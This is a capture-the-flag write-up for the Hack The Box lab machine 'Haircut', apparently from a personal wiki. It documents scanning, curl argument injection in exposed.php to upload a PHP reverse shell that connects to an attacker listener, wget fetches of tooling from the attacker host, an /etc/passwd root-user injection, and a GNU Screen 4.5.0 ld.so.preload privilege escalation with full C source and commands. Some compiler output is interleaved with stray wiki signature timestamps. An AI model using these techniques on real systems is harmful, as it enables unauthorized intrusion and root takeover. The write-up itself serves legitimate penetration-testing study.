Haircut
Contents
Ports scan
u505@kali:~/HTB/Machines/Haircut$ sudo masscan -e tun0 -p1-65535,U:1-65535 --rate 1000 10.10.10.24
Starting masscan 1.0.5 at 2020-05-05 01:41:23 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 22/tcp on 10.10.10.24 Discovered open port 80/tcp on 10.10.10.24
u505@kali:~/HTB/Machines/Haircut$ nmap -sC -sV 10.10.10.24 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-04 21:41 EDT Nmap scan report for harcut.htb (10.10.10.24) Host is up (0.050s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 e9:75:c1:e4:b3:63:3c:93:f2:c6:18:08:36:48:ce:36 (RSA) | 256 87:00:ab:a9:8f:6f:4b:ba:fb:c6:7a:55:a8:60:b2:68 (ECDSA) |_ 256 b6:1b:5c:a9:26:5c:dc:61:b7:75:90:6c:88:51:6e:54 (ED25519) 80/tcp open http nginx 1.10.0 (Ubuntu) |_http-server-header: nginx/1.10.0 (Ubuntu) |_http-title: HTB Hairdresser Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 10.45 seconds
Web enumeration
u505@kali:~/HTB/Machines/Haircut$ curl http://haircut.htb <!DOCTYPE html> <title> HTB Hairdresser </title> <center> <br><br><br><br> <img src="bounce.jpg" height="750" width="1200" alt="" /> <center>
Dirsearch
u505@kali:~/HTB/Machines/Haircut$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common2.txt -e "js,html,txt,php" -f -t 50 -u http://haircut.htb
_|. _ _ _ _ _ _|_ v0.3.9 (_||| _) (/_(_|| (_| )
Extensions: js, html, txt, php | HTTP method: get | Threads: 50 | Wordlist size: 22974
Error Log: /opt/utils/dirsearch/logs/errors-20-05-04_21-52-59.log
Target: http://haircut.htb
[21:52:59] Starting: [21:53:26] 200 - 144B - /index.html [21:53:53] 200 - 223B - /test.html [21:53:56] 403 - 580B - /uploads/
Task Completed
test.html
u505@kali:~/HTB/Machines/Haircut$ curl http://haircut.htb/test.html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <body> <img src='carrie.jpg'></img> </body> </html>
Extended dirsearch
The first dirsearch found only 2 web pages, and they don't seem important, so we repeat the search with a larger dictionary.
u505@kali:~/HTB/Machines/Haircut$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e "js,html,txt,php,jpg" -f -t 50 -u http://haircut.htb/
_|. _ _ _ _ _ _|_ v0.3.9 (_||| _) (/_(_|| (_| )
Extensions: js, html, txt, php, jpg | HTTP method: get | Threads: 50 | Wordlist size: 1323125
Error Log: /opt/utils/dirsearch/logs/errors-20-05-04_22-08-34.log
Target: http://haircut.htb/
[22:08:34] Starting: [22:08:35] 200 - 144B - /index.html [22:08:37] 403 - 580B - /uploads/ [22:08:45] 200 - 223B - /test.html [22:10:05] 200 - 132KB - /sea.jpg [22:11:45] 200 - 141B - /hair.html [22:12:15] 200 - 114KB - /bounce.jpg [22:14:45] 200 - 446B - /exposed.php [22:23:59] 200 - 164KB - /carrie.jpg CTRL+C detected: Pausing threads, please wait... [e]xit / [c]ontinue: e
Canceled by the user
Hair.html
u505@kali:~/HTB/Machines/Haircut$ curl http://haircut.htb/hair.html <!DOCTYPE html> <title> HTB Hairdresser </title> <center> <br><br><br><br> <img src="sea.jpg" height="750" width="1200" alt="" /> <center>
exposed.php
This page shows a form with a URL.
The page seems to fetch a page. And we see curl information on the screen.
We start a simple web server and a simple php page.
505@kali:~/HTB/Machines/Haircut$ cd www/ u505@kali:~/HTB/Machines/Haircut/www$ cat test.php <?php phpinfo(); ?> u505@kali:~/HTB/Machines/Haircut/www$ sudo python -m SimpleHTTPServer 80 [sudo] password for u505: Serving HTTP on 0.0.0.0 port 80 ...
We try our URL.
Our file is downloaded.
But the file is read, but not interpreted.
If we add the modifier -h.
The usage screen appears.
We send the URL http://10.10.14.32/test.php -o test.php
But it answers, permission denied.
Dirsearch spotted a folder uploads, so we try with the value http://10.10.14.32/test.php -o uploads/test.php
And this time our file is interpreted.
Reverse shell
we prepare our php reverse shell script.
u505@kali:~/HTB/Machines/Haircut/www$ cp /usr/share/webshells/php/php-reverse-shell.php ./ u505@kali:~/HTB/Machines/Haircut/www$ grep CHANGE php-reverse-shell.php $ip = '10.10.14.32'; // CHANGE THIS $port = 4444; // CHANGE THIS
We open a listener.
u505@kali:~/HTB/Machines/Haircut$ rlwrap nc -lvnp 4444 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444
We call exposed.php with the following URL http://10.10.14.32/php-reverse-shell.php -o uploads/reverse.php
We call the reverse shell.
u505@kali:~/HTB/Machines/Haircut$ curl http://haircut.htb/uploads/reverse.php
And the reverse shell appears.
u505@kali:~/HTB/Machines/Haircut$ rlwrap nc -lvnp 4444 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444 Ncat: Connection from 10.10.10.24. Ncat: Connection from 10.10.10.24:50962. Linux haircut 4.4.0-78-generic #99-Ubuntu SMP Thu Apr 27 15:29:09 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux 04:46:06 up 1:01, 0 users, load average: 0.02, 0.04, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ python -c "import pty;pty.spawn('/bin/bash')" /bin/sh: 1: python: not found $ python3 -c "import pty;pty.spawn('/bin/bash')" www-data@haircut:/$ stty raw -echo stty raw -echo
User Flag
www-data@haircut:/$ cat /home/maria/Desktop/user.txt <USER_FLAG>
Enumeration
www-data@haircut:~$ cd /tmp www-data@haircut:/tmp$ wget -q http://10.10.14.32/LinEnum.sh www-data@haircut:/tmp$ wget -q http://10.10.14.32/pspy64 www-data@haircut:/tmp$ chmod +x LinEnum.sh pspy64
The enumeration finds a setuid file.
www-data@haircut:/tmp$ ./LinEnum.sh
...
[-] SUID files:
...
-rwsr-xr-x 1 root root 54256 May 4 2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 1588648 May 19 2017 /usr/bin/screen-4.5.0
-rwsr-xr-x 1 root root 40432 May 4 2017 /usr/bin/chsh
...
Searchsploit
u505@kali:~/HTB/Machines/Haircut$ searchsploit screen 4.5
--------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
--------------------------------------------------------- ----------------------------------------
GNU Screen 4.5.0 - Local Privilege Escalation | exploits/linux/local/41154.sh
GNU Screen 4.5.0 - Local Privilege Escalation (PoC) | exploits/linux/local/41152.txt
--------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
u505@kali:~/HTB/Machines/Haircut/www$ searchsploit -m 41154
Exploit: GNU Screen 4.5.0 - Local Privilege Escalation
URL: https://www.exploit-db.com/exploits/41154
Path: /usr/share/exploitdb/exploits/linux/local/41154.sh
File Type: Bourne-Again shell script, ASCII text executable, with CRLF line terminators
Copied to: /home/u505/HTB/Machines/Haircut/www/41154.sh
u505@kali:~/HTB/Machines/Haircut/www$ searchsploit -m 41152
Exploit: GNU Screen 4.5.0 - Local Privilege Escalation (PoC)
URL: https://www.exploit-db.com/exploits/41152
Path: /usr/share/exploitdb/exploits/linux/local/41152.txt
File Type: ASCII text, with CRLF line terminators
Copied to: /home/u505/HTB/Machines/Haircut/www/41152.txt
Add line to /etc/passwd
As explained on the exploit 41152, we can write files with screen and the owner is root. So I tried to add a user root to /etc/passwd.
www-data@haircut:/tmp$ cat /etc/passwd > newfile www-data@haircut:/tmp$ echo "u505:`openssl passwd hello`:0:0::/:/bin/bash">> newfile www-data@haircut:/tmp$ tail newfile lxd:x:106:65534::/var/lib/lxd/:/bin/false messagebus:x:107:111::/var/run/dbus:/bin/false uuidd:x:108:112::/run/uuidd:/bin/false dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false maria:x:1000:1000:maria,,,:/home/maria:/bin/bash mysql:x:110:117:MySQL Server,,,:/nonexistent:/bin/false lightdm:x:111:118:Light Display Manager:/var/lib/lightdm:/bin/false pulse:x:112:121:PulseAudio daemon,,,:/var/run/pulse:/bin/false sshd:x:113:65534::/var/run/sshd:/usr/sbin/nologin u505:vz5QLJsL/YvB6:0:0::/:/bin/bash www-data@haircut:/tmp$ /usr/bin/screen-4.5.0 -D -m -L /etc/passwd cat newfile getpwuid() can't identify your account! www-data@haircut:/tmp$ ls -l /etc/passwd -rw-r--r-- 1 0 root 0 May 6 23:35 /etc/passwd
After that the machine was FUBAR, because the file /etc/passwd was erased before it could verify the user. This method works to write other files, but not /etc/passwd,...
screenroot.sh
This script creates a rootshell, and a shared library. The shared library will change the owner and set the setuid of the root shell, and screen allows us create the file /etc/so.preload as owner root. Once our setuid screen is called, the shared librairy is called, and the rights of our rootshell are updated, and we gain full root access to the server. The shell script should work on the target, but the root shell doesn't compile, because headers of function execvp are missing on the target. So I compiled the files locally and transferred them to the target.
u505@kali:~/HTB/Machines/Haircut$ cat libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
chown("/tmp/rootshell", 0, 0);
chmod("/tmp/rootshell", 04755);
unlink("/etc/ld.so.preload");
printf("[+] /tmp/rootshell is setuid as root!\n");
}
The shared library change owner and setuid our rootshell.
u505@kali:~/HTB/Machines/Haircut$ gcc -fPIC -shared -ldl -o libhax.so libhax.c
libhax.c: In function ‘dropshell’:
libhax.c:7:5: warning: implicit declaration of function ‘chmod’ [-Wimplicit-function-declaration]
7 | chmod("/tmp/rootshell", 04755);
| ^Daniel Simao 18:38, 6 May 2020 (EDT)
The shared library is compiled.
u505@kali:~/HTB/Machines/Haircut$ cat rootshell.c
#include <stdio.h>
int main(void){
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
execvp("/bin/sh", NULL, NULL);
}
The root shell.
u505@kali:~/HTB/Machines/Haircut$ gcc -o rootshell rootshell.c
rootshell.c: In function ‘main’:
rootshell.c:3:5: warning: implicit declaration of function ‘setuid’ [-Wimplicit-function-declaration]
3 | setuid(0);
| ^18:38, 6 May 2020 (EDT)
rootshell.c:4:5: warning: implicit declaration of function ‘setgid’ [-Wimplicit-function-declaration]
4 | setgid(0);
| ^18:38, 6 May 2020 (EDT)
rootshell.c:5:5: warning: implicit declaration of function ‘seteuid’ [-Wimplicit-function-declaration]
5 | seteuid(0);
| ^18:38, 6 May 2020 (EDT)~
rootshell.c:6:5: warning: implicit declaration of function ‘setegid’ [-Wimplicit-function-declaration]
6 | setegid(0);
| ^18:38, 6 May 2020 (EDT)~
rootshell.c:7:5: warning: implicit declaration of function ‘execvp’ [-Wimplicit-function-declaration]
7 | execvp("/bin/sh", NULL, NULL);
| ^18:38, 6 May 2020 (EDT)
rootshell.c:7:5: warning: too many arguments to built-in function ‘execvp’ expecting 2 [-Wbuiltin-declaration-mismatch]
We copy the 2 executable files to our www folder to download them from the target.
u505@kali:~/HTB/Machines/Haircut$ cp rootshell libhax.so www
From the target we download the compiled files.
www-data@haircut:/tmp$ wget -q http://10.10.14.32/libhax.so www-data@haircut:/tmp$ wget -q http://10.10.14.32/rootshell www-data@haircut:/tmp$ chmod +x rootshell libhax.so
We create the file /etc/ls.so.preload to execute the shared library that change rights on our rootshell.
www-data@haircut:/tmp$ cd /etc www-data@haircut:/etc$ umask 000 www-data@haircut:/etc$ screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" www-data@haircut:/etc$ ls -l ld.so.preload ' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored. ERROR: ld.so: object '/tmp/libhax.so' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored. -rw-rw-rw- 1 root www-data 16 May 7 00:31 ld.so.preload
We execute screen, that is setuid.
/tmp/libhax.sowww-data@haircut:/etc$ screen -ls
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] /tmp/rootshell is setuid as root!
No Sockets found in /tmp/screens/S-www-data.
We check our rootshell.
www-data@haircut:/etc$ cd /tmp
www-data@haircut:/tmp$ ls -l
total 48
---x--x--x 1 www-data www-data 16136 May 7 00:24 libhax.so
-rwsr-xr-x 1 root root 16824 May 7 00:24 rootshell
drwxr-xr-x 3 root www-data 4096 May 7 00:31 screens
drwx------ 3 root root 4096 May 7 00:20 systemd-private-3fedca1df1a34cdb8373f77ecd96a733-systemd-timesyncd.service-BgcIhT
drwx------ 2 root root 4096 May 7 00:20 vmware-root
Root Flag
www-data@haircut:/tmp$ ./rootshell
# id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
# cat /root/root.txt
<ROOT_FLAG>
References
Daniel Simao 15:58, 5 May 2020 (EDT)
